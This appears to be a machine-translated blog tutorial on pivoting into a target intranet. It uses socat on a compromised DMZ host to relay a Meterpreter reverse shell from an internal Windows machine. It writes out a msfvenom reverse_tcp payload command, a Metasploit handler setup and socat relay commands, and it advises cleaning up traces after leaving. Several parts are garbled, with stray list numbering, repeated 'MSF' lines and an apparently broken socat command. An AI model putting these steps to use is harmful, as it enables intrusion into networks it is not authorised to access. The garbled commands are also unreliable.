IMCAFS

 Home

how to use socat to penetrate the target intranet more easily

Posted by santillano at 2020-04-11
all

0x01 Environment Description:

One

Two

Three

Lnmp01 is assumed to be the target DMZ segment machine, which will be the proxy later

Suppose its public IP is 192.168.3.30

Suppose its intranet IP is 192.168.32.167

One

Two

Win7 assumes the target intranet machine

Suppose its intranet IP is 192.168.32.144

One

Two

Local machine

Suppose the local intranet IP is 192.168.3.15

0x02 some prerequisites to note

One

The local machine can ping and communicate with lnmp01, lnmp01 and win7 in the target Intranet

0x03 the ultimate goal is to achieve dual intranet communication, that is, to operate the machines in the target Intranet in my own intranet. Of course, there are many ways to achieve dual intranet communication, such as several commonly used methods:

One

Two

Three

Four

Five

Six

The most traditional way is to use LCX listen in VPS for forwarding, and then use the local bind

In addition, VPN is built through VPS. The local area is connected to the VPN intranet first, and then transmitted to the local area through VPN intranet by LCX tran on VPS

In addition, use the port forwarding function of the meterpreter. Of course, that's implemented by the meterpreter tunnel itself. That is to say, you need to bounce back the shell of the meterpreter first, because this is not the focus of the day, so we won't do more introduction for the moment. If you are interested, you can dig and Study on your own

Moreover, in some advanced horses, there are also various intranet proxy functions

Finally, this is what we will explain in detail. We will use socat and target DMZ to establish a two-way channel, and then bring out the traffic of all machines in the target intranet

...

0x04 implementation idea:

One

DMZ machine as agent - > transfer all the traffic of the horse to the designated port of DMZ machine - > set up a two-way channel between the local and the port transferred out of the agent side - > local only needs to monitor the traffic of the transferred horse - > successfully go online

0x05 first install socat in lnmp01. In practice, it is recommended to compile and install it. When you leave, you can directly kill the entire installation directory together. It is clean:

One

# yum install socat -y

0x06 prepare the reverse payload locally. Note that the anti connection IP here should write the IP of the machine [lnmp01] at the DMZ boundary

One

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.30 LPORT=443 -f exe -o /root/shell.exe

0x07 start listening locally:

One

Two

Three

Four

Five

msf > use exploit/multi/handler

msf exploit(handler) > set payload /meterpreter/

MSF

MSF

MSF

0x08 to perform proxy operation on lnmp01, which means to bind the local port 53 and port 443, is equivalent to building a pipeline on the local machine. In fact, the local machine is an intermediary. When someone accesses port 53 of the local machine, it will automatically drop the data to the port 443 of the local machine, and the port 443 is the port of the local machine, which naturally results in the online effect:

One

# nohup socat tcp-listen:53 tcp-listen:443

0x09 at this time, go back to the local area and establish a two-way channel with the proxy side. It's better to hang it all the time in the background, which means binding port 443 of the local area and port 53 of the proxy side. In this way, when you access port 443 of the local area, it's equivalent to accessing port 53 of the proxy side, and the port of the proxy side is bound to port 443 of the local area, So when the traffic of port 443 of the horse bounces back, it is equivalent to directly bounced to my local area:

One

# nohup socat tcp:192.168.3.30:53 tcp:192.168.3.15:443

0x10 finally, execute payload on the intranet machine, and the horse successfully goes online

0X11 about socat:

One

Two

Three

A Linux Advanced port forwarding tool, which supports n multi protocol, can basically drop all kinds of known port forwarding tools on the market

Of course, it is not just a port forwarding function, such as building various tunnels and so on

Because it's not the point today, I won't explain it too much here. I will explain it in detail later if I have time

0x12 advantages:

One

Two

Three

Four

No need to forward on VPS

Only one boundary machine is needed to bring all the machines on the intranet Online

Stable, socat belongs to the system's own tools, easy to use, more suitable for intranet penetration

...

0x13 disadvantages:

One

Two

The firewall blocks the access to the specified port. To be honest, if you have obtained the permission of the target machine, it is easier to open two ports with iptables, for fear of other messy protection

If the real port can not come out, it can only be done through various multiplexing, or by using a lower layer of protocol tunnel, such as ICMP, UDP Tunnel

© 2023